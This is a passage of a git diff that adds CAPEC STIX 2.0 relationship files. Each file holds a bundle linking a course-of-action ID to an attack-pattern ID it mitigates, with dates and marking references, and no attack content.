"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1de48e9e-d723-4e09-8f82-58850a322009.json b/capec/relationship/relationship--1de48e9e-d723-4e09-8f82-58850a322009.json new file mode 100644 index 0000000000..8814f4a37f --- /dev/null +++ b/capec/relationship/relationship--1de48e9e-d723-4e09-8f82-58850a322009.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--95a10300-5a08-4451-83b9-16a6a4dded92", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1de48e9e-d723-4e09-8f82-58850a322009", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a257365-86f5-44ce-84f9-ee47d9d88243", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1e183c89-a8ef-4363-ad68-714b5e204618.json b/capec/relationship/relationship--1e183c89-a8ef-4363-ad68-714b5e204618.json new file mode 100644 index 0000000000..1cc942d4bd --- /dev/null +++ b/capec/relationship/relationship--1e183c89-a8ef-4363-ad68-714b5e204618.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--50c96b7b-6713-4746-9acf-3e8b875871c1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1e183c89-a8ef-4363-ad68-714b5e204618", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--181e9016-6187-47ba-aa85-ff726a951dae", + "target_ref": "attack-pattern--eca65a23-cc6f-4bd9-ba21-e64510a66038", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1e56ad74-b2cd-4272-b9fe-b72befdd3974.json b/capec/relationship/relationship--1e56ad74-b2cd-4272-b9fe-b72befdd3974.json new file mode 100644 index 0000000000..1425bf1416 --- /dev/null +++ b/capec/relationship/relationship--1e56ad74-b2cd-4272-b9fe-b72befdd3974.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--57382c7d-584f-4ea0-b98a-4988f42aac2c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1e56ad74-b2cd-4272-b9fe-b72befdd3974", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1e708afb-208f-4166-a11b-40342db93818.json b/capec/relationship/relationship--1e708afb-208f-4166-a11b-40342db93818.json new file mode 100644 index 0000000000..8e2fa1ccdf --- /dev/null +++ b/capec/relationship/relationship--1e708afb-208f-4166-a11b-40342db93818.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e4beecb7-24a6-45f3-90ce-f8af7fa9cff8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1e708afb-208f-4166-a11b-40342db93818", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dbc2eaec-3912-4414-a6ca-c88c494ad97c", + "target_ref": "attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1e882b1c-a38b-4059-945d-44885804a5c7.json b/capec/relationship/relationship--1e882b1c-a38b-4059-945d-44885804a5c7.json new file mode 100644 index 0000000000..83323c877b --- /dev/null +++ b/capec/relationship/relationship--1e882b1c-a38b-4059-945d-44885804a5c7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8d8d48e6-064b-4545-abf8-8f1df6168204", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1e882b1c-a38b-4059-945d-44885804a5c7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a785e881-67df-42d6-93ba-1febf606948b", + "target_ref": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1eb8e908-57d4-4685-962a-af7362d3c0b5.json b/capec/relationship/relationship--1eb8e908-57d4-4685-962a-af7362d3c0b5.json new file mode 100644 index 0000000000..82d0f3fc9d --- /dev/null +++ b/capec/relationship/relationship--1eb8e908-57d4-4685-962a-af7362d3c0b5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ee1ad4b3-0e32-4df7-a86f-2edfb5cd55b4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1eb8e908-57d4-4685-962a-af7362d3c0b5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a6c793b-b5f6-457d-b758-59fb951a3ac3", + "target_ref": "attack-pattern--6ce665bb-ddcc-4955-beb4-052321107530", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1f14c3e6-c62b-4ac2-bfd7-7b004ea6fd38.json b/capec/relationship/relationship--1f14c3e6-c62b-4ac2-bfd7-7b004ea6fd38.json new file mode 100644 index 0000000000..4b9f08085d --- /dev/null +++ b/capec/relationship/relationship--1f14c3e6-c62b-4ac2-bfd7-7b004ea6fd38.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4390c59f-0757-421b-8d0d-df10a8b2b244", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1f14c3e6-c62b-4ac2-bfd7-7b004ea6fd38", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4", + "target_ref": "attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1f30afb7-1953-45f8-975c-dc920f73d473.json b/capec/relationship/relationship--1f30afb7-1953-45f8-975c-dc920f73d473.json new file mode 100644 index 0000000000..7c5168e328 --- /dev/null +++ b/capec/relationship/relationship--1f30afb7-1953-45f8-975c-dc920f73d473.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8b4b5383-8b2d-4b77-96a3-0f2d09e5955a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1f30afb7-1953-45f8-975c-dc920f73d473", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--df2e871a-78b5-4ba1-83d2-30886d304580", + "target_ref": "attack-pattern--fca5be19-03c1-4d06-8cb8-30687732cc12", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1f7f81e8-3b04-49a1-babd-2ef6e940666c.json b/capec/relationship/relationship--1f7f81e8-3b04-49a1-babd-2ef6e940666c.json new file mode 100644 index 0000000000..f0e2841036 --- /dev/null +++ b/capec/relationship/relationship--1f7f81e8-3b04-49a1-babd-2ef6e940666c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8a746fa8-f981-4ca6-86ba-08b10d986663", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1f7f81e8-3b04-49a1-babd-2ef6e940666c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89", + "target_ref": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1f89fa6a-7453-4013-a34f-689b973a23e3.json b/capec/relationship/relationship--1f89fa6a-7453-4013-a34f-689b973a23e3.json new file mode 100644 index 0000000000..a37a83f4ee --- /dev/null +++ b/capec/relationship/relationship--1f89fa6a-7453-4013-a34f-689b973a23e3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--70d59843-c8d2-48f3-ab45-df17075d2d21", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1f89fa6a-7453-4013-a34f-689b973a23e3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28", + "target_ref": "attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--1fe263b0-04b9-4913-a084-d8725f7f7b68.json b/capec/relationship/relationship--1fe263b0-04b9-4913-a084-d8725f7f7b68.json new file mode 100644 index 0000000000..b2cabb0498 --- /dev/null +++ b/capec/relationship/relationship--1fe263b0-04b9-4913-a084-d8725f7f7b68.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c345fba4-a1e3-4b77-83ca-4b8d2e94fc11", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1fe263b0-04b9-4913-a084-d8725f7f7b68", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9de6ec93-36de-425d-8666-768d8c83cb08", + "target_ref": "attack-pattern--bded7a75-5d5c-4d00-b403-d840f6631823", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--207131df-5246-4c27-9dde-d897d7f253a2.json b/capec/relationship/relationship--207131df-5246-4c27-9dde-d897d7f253a2.json new file mode 100644 index 0000000000..5ae15f48fd --- /dev/null +++ b/capec/relationship/relationship--207131df-5246-4c27-9dde-d897d7f253a2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--74531191-1098-435e-befa-b7cc10c010ae", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--207131df-5246-4c27-9dde-d897d7f253a2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-09-30T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbca4034-a547-4794-aa48-3d96f0bdefc2", + "target_ref": "attack-pattern--4af1aa45-5db1-4fbf-a5ee-f205d163cc9e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--209a3806-a657-478d-9382-2cc64291f6a0.json b/capec/relationship/relationship--209a3806-a657-478d-9382-2cc64291f6a0.json new file mode 100644 index 0000000000..9a05c8ddc1 --- /dev/null +++ b/capec/relationship/relationship--209a3806-a657-478d-9382-2cc64291f6a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8c8695fe-d184-4a16-b9fb-fedd15f23db0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--209a3806-a657-478d-9382-2cc64291f6a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--47ff9928-47a5-430a-ab40-693332919418", + "target_ref": "attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--20e81069-3719-4684-aa7c-43af82746bf5.json b/capec/relationship/relationship--20e81069-3719-4684-aa7c-43af82746bf5.json new file mode 100644 index 0000000000..988a1c1c70 --- /dev/null +++ b/capec/relationship/relationship--20e81069-3719-4684-aa7c-43af82746bf5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--448f3859-0273-474d-9f52-41093b4d5d3a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--20e81069-3719-4684-aa7c-43af82746bf5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--65e983bd-ecc0-40dc-ae11-8767d8a747f1", + "target_ref": "attack-pattern--69f7ae46-ecf7-4550-a92f-dd3fc65ac086", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--20e8b9af-45d9-40b4-89e6-3795e035f51b.json b/capec/relationship/relationship--20e8b9af-45d9-40b4-89e6-3795e035f51b.json new file mode 100644 index 0000000000..8cb6ea93a4 --- /dev/null +++ b/capec/relationship/relationship--20e8b9af-45d9-40b4-89e6-3795e035f51b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4abcd200-b8cd-4195-a9a1-daa8428cc31c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--20e8b9af-45d9-40b4-89e6-3795e035f51b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8765b029-9621-452e-9a68-6ea740a42ece", + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2294febb-9f8b-40a6-911c-f9b179522be3.json b/capec/relationship/relationship--2294febb-9f8b-40a6-911c-f9b179522be3.json new file mode 100644 index 0000000000..0450b7ac53 --- /dev/null +++ b/capec/relationship/relationship--2294febb-9f8b-40a6-911c-f9b179522be3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2d7523c7-d390-438f-a347-53dc47cf7cc8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2294febb-9f8b-40a6-911c-f9b179522be3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2561f0e-be8a-42c5-af7e-b0baaddc34c0", + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--237f63b0-e1b6-488d-b059-ec759cf6d24b.json b/capec/relationship/relationship--237f63b0-e1b6-488d-b059-ec759cf6d24b.json new file mode 100644 index 0000000000..0321f951c2 --- /dev/null +++ b/capec/relationship/relationship--237f63b0-e1b6-488d-b059-ec759cf6d24b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--73b17d96-048d-40db-9289-2fea0f5fa40c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--237f63b0-e1b6-488d-b059-ec759cf6d24b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a15169a5-13e5-4222-aef0-2452e9fe0921", + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--23d7d11a-ccd2-494d-b2dc-2e4a7b4506bf.json b/capec/relationship/relationship--23d7d11a-ccd2-494d-b2dc-2e4a7b4506bf.json new file mode 100644 index 0000000000..9ebe0c4add --- /dev/null +++ b/capec/relationship/relationship--23d7d11a-ccd2-494d-b2dc-2e4a7b4506bf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cdd3a3de-56a9-497b-b07e-6ef4f20194c7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--23d7d11a-ccd2-494d-b2dc-2e4a7b4506bf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2706dc6-3de4-4fe9-bea1-e4dc299d2135", + "target_ref": "attack-pattern--0278e44f-8fb4-4c02-bde1-0ccbe12a1b15", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2563f295-5573-4255-a1f6-7ee682f62212.json b/capec/relationship/relationship--2563f295-5573-4255-a1f6-7ee682f62212.json new file mode 100644 index 0000000000..34154a9ee0 --- /dev/null +++ b/capec/relationship/relationship--2563f295-5573-4255-a1f6-7ee682f62212.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ef715ce1-b9be-49f3-9abc-b02de6cf1621", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2563f295-5573-4255-a1f6-7ee682f62212", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fef2690d-0830-4691-a0a7-247db5d61967", + "target_ref": "attack-pattern--32ddfdf7-42d4-48d8-85ba-0e5de91cb711", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--258dcdbb-8d95-46a1-a8ae-a0d978b57b8f.json b/capec/relationship/relationship--258dcdbb-8d95-46a1-a8ae-a0d978b57b8f.json new file mode 100644 index 0000000000..c668c470e7 --- /dev/null +++ b/capec/relationship/relationship--258dcdbb-8d95-46a1-a8ae-a0d978b57b8f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2d74561e-7cb3-49f1-8247-98add6141985", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--258dcdbb-8d95-46a1-a8ae-a0d978b57b8f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f823d9a4-e666-403c-b92f-6533f8fc992d", + "target_ref": "attack-pattern--5eea64eb-4ae7-4b82-8b47-fdf143767059", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--259f250f-174c-4de7-9ff1-f5d63d9f4861.json b/capec/relationship/relationship--259f250f-174c-4de7-9ff1-f5d63d9f4861.json new file mode 100644 index 0000000000..02b10a98c6 --- /dev/null +++ b/capec/relationship/relationship--259f250f-174c-4de7-9ff1-f5d63d9f4861.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6a344809-b4ba-45d6-9b13-069eb13d8580", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--259f250f-174c-4de7-9ff1-f5d63d9f4861", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--97f10aab-e938-46e9-96e2-f01a26f78c4d", + "target_ref": "attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--25e17ee0-ca6f-45b3-8159-af6c9ee6a320.json b/capec/relationship/relationship--25e17ee0-ca6f-45b3-8159-af6c9ee6a320.json new file mode 100644 index 0000000000..91caf62bba --- /dev/null +++ b/capec/relationship/relationship--25e17ee0-ca6f-45b3-8159-af6c9ee6a320.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a7546a7a-14aa-4c42-b427-f22de4284cd9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--25e17ee0-ca6f-45b3-8159-af6c9ee6a320", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "target_ref": "attack-pattern--32680284-d757-4f2e-afe6-40386d38c92a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--25fc7307-68af-4ebd-b242-54b63889347d.json b/capec/relationship/relationship--25fc7307-68af-4ebd-b242-54b63889347d.json new file mode 100644 index 0000000000..eed8da639f --- /dev/null +++ b/capec/relationship/relationship--25fc7307-68af-4ebd-b242-54b63889347d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c9603e88-c946-480d-92e2-73bced1dcc6c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--25fc7307-68af-4ebd-b242-54b63889347d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2248876f-47b7-4818-9150-38be47817f40", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--26e72254-f7e5-44c2-8a3e-2a78d130b5c6.json b/capec/relationship/relationship--26e72254-f7e5-44c2-8a3e-2a78d130b5c6.json new file mode 100644 index 0000000000..9bfbd59f15 --- /dev/null +++ b/capec/relationship/relationship--26e72254-f7e5-44c2-8a3e-2a78d130b5c6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b57e2a3b-316f-4352-8422-4f73b7014acd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--26e72254-f7e5-44c2-8a3e-2a78d130b5c6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f010580e-dc07-4767-a265-30e908fb80a8", + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--274e4808-9a33-4298-aa29-938291b48a4d.json b/capec/relationship/relationship--274e4808-9a33-4298-aa29-938291b48a4d.json new file mode 100644 index 0000000000..d437c0565d --- /dev/null +++ b/capec/relationship/relationship--274e4808-9a33-4298-aa29-938291b48a4d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--96f85e41-2d8c-456f-960e-df1d13f10602", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--274e4808-9a33-4298-aa29-938291b48a4d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--56ee7284-adfd-41b9-b592-5092da42b889", + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--278293b6-4f1f-4025-9511-c9b8f4339668.json b/capec/relationship/relationship--278293b6-4f1f-4025-9511-c9b8f4339668.json new file mode 100644 index 0000000000..e7eae9e411 --- /dev/null +++ b/capec/relationship/relationship--278293b6-4f1f-4025-9511-c9b8f4339668.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9d9b270b-bbfe-49b0-96bf-c874f3add8b8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--278293b6-4f1f-4025-9511-c9b8f4339668", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671", + "target_ref": "attack-pattern--e372df87-d117-476a-907d-0372310c2414", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2832eade-8817-43d1-88df-966aea51275c.json b/capec/relationship/relationship--2832eade-8817-43d1-88df-966aea51275c.json new file mode 100644 index 0000000000..2bc2c6ac76 --- /dev/null +++ b/capec/relationship/relationship--2832eade-8817-43d1-88df-966aea51275c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c9618df3-04b3-446e-8e3f-e25e6e46a80d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2832eade-8817-43d1-88df-966aea51275c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--45bdb955-8441-4ff0-ab60-682fcc086f9a", + "target_ref": "attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--285cebe8-107a-4dc4-bcf0-f551abd8d818.json b/capec/relationship/relationship--285cebe8-107a-4dc4-bcf0-f551abd8d818.json new file mode 100644 index 0000000000..94530ad9e3 --- /dev/null +++ b/capec/relationship/relationship--285cebe8-107a-4dc4-bcf0-f551abd8d818.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fedb41e0-e7ad-45bb-abf4-b09416cb3544", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--285cebe8-107a-4dc4-bcf0-f551abd8d818", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--986bd250-42c2-4f6f-8368-c2ab7695a94b", + "target_ref": "attack-pattern--750c8077-a3b7-4332-9fc6-a59435be6c57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--287e77a8-6932-4aaf-89fb-fb8430c7fcf0.json 